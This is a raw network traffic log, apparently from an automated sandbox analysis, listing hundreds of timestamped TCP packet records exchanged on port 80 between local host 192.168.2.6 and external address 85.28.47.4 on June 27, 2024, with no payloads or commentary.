                                                                Jun 27, 2024 05:58:12.401772022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401796103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401809931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401827097 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401837111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401853085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401911974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401926041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401941061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401953936 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401954889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.401972055 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401987076 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.401999950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.402683020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.402726889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.402729988 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.402743101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.402769089 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.402781010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.402787924 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.402797937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.402822018 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.402839899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.402868986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.402884007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.402898073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.402911901 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.402928114 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.402940989 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.483417034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483441114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483458996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483494997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.483519077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483536005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483544111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.483555079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483566999 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.483572960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483597040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.483625889 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.483815908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483833075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483850956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483865023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.483867884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483881950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.483886003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483902931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483910084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.483921051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.483933926 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.483948946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.483969927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484096050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484112978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484127998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484143019 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484143972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484158039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484167099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484178066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484185934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484199047 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484210968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484225988 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484426975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484443903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484458923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484473944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484477043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484498978 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484508991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484520912 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484525919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484541893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484554052 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484559059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484566927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484577894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484587908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484594107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484599113 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484611988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484622955 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484627962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484638929 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484644890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484652042 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484662056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484672070 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484678984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484684944 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484695911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.484705925 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484719992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.484738111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485152960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485169888 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485202074 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485217094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485327959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485344887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485359907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485374928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485379934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485390902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485402107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485408068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485423088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485426903 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485439062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485444069 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485455990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485471010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485471964 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485486984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485488892 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485503912 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485516071 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485519886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485536098 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485541105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485551119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.485564947 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.485593081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486197948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486215115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486227989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486243010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486258030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486259937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486274004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486274004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486289978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486294985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486306906 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486319065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486323118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486336946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486339092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486349106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486357927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486368895 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486372948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486381054 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486391068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486397982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486407995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486418009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486433029 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486452103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486677885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486695051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486711979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486725092 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486725092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.486737967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486762047 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.486977100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487000942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487015963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487025023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487031937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487041950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487050056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487061977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487067938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487075090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487085104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487091064 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487101078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487109900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487118006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487131119 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487134933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487145901 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487152100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487159967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487168074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487178087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487185001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487196922 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487201929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487215042 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487220049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487222910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487241030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487245083 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487257957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487261057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487277031 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487293959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487734079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487750053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487765074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487780094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487787962 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487808943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487808943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487826109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487833977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487843990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487859011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487864017 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487876892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487884998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487894058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487907887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487910032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.487922907 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487936974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.487953901 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.488655090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.488679886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.488708019 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.488723040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.488739967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.488780022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.488821030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.488837957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.488853931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.488864899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.488869905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.488884926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.488884926 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.488900900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.488914967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.488934994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.489767075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.489820957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.489830017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.489846945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.489872932 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.489886045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.489911079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.489928007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.489943027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.489957094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.489958048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.489973068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.489995003 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570266962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570321083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570346117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570363045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570367098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570379019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570390940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570395947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570411921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570434093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570447922 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570476055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570513010 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570527077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570574999 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570606947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570622921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570643902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570653915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570674896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570683002 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570740938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570784092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570789099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570801973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570817947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570827961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570832968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.570847034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570858955 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.570878029 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571012020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571029902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571047068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571058989 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571063042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571067095 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571080923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571089983 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571105957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571120977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571300983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571317911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571331978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571346045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571347952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571360111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571362019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571372032 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571377993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571388960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571393967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571408987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571413040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571425915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571434975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571443081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571459055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571460009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571481943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571501017 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571789980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571810961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571834087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571845055 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571932077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571948051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571973085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.571975946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571986914 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.571990967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572006941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572015047 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572024107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572031975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572041035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572042942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572060108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572063923 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572077036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572079897 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572088957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572092056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572109938 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572124004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572458982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572475910 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572501898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572504044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572520018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572521925 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572540045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572546005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572556019 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572561979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572578907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572585106 CEST4971180192.168.2.685.28.47.4
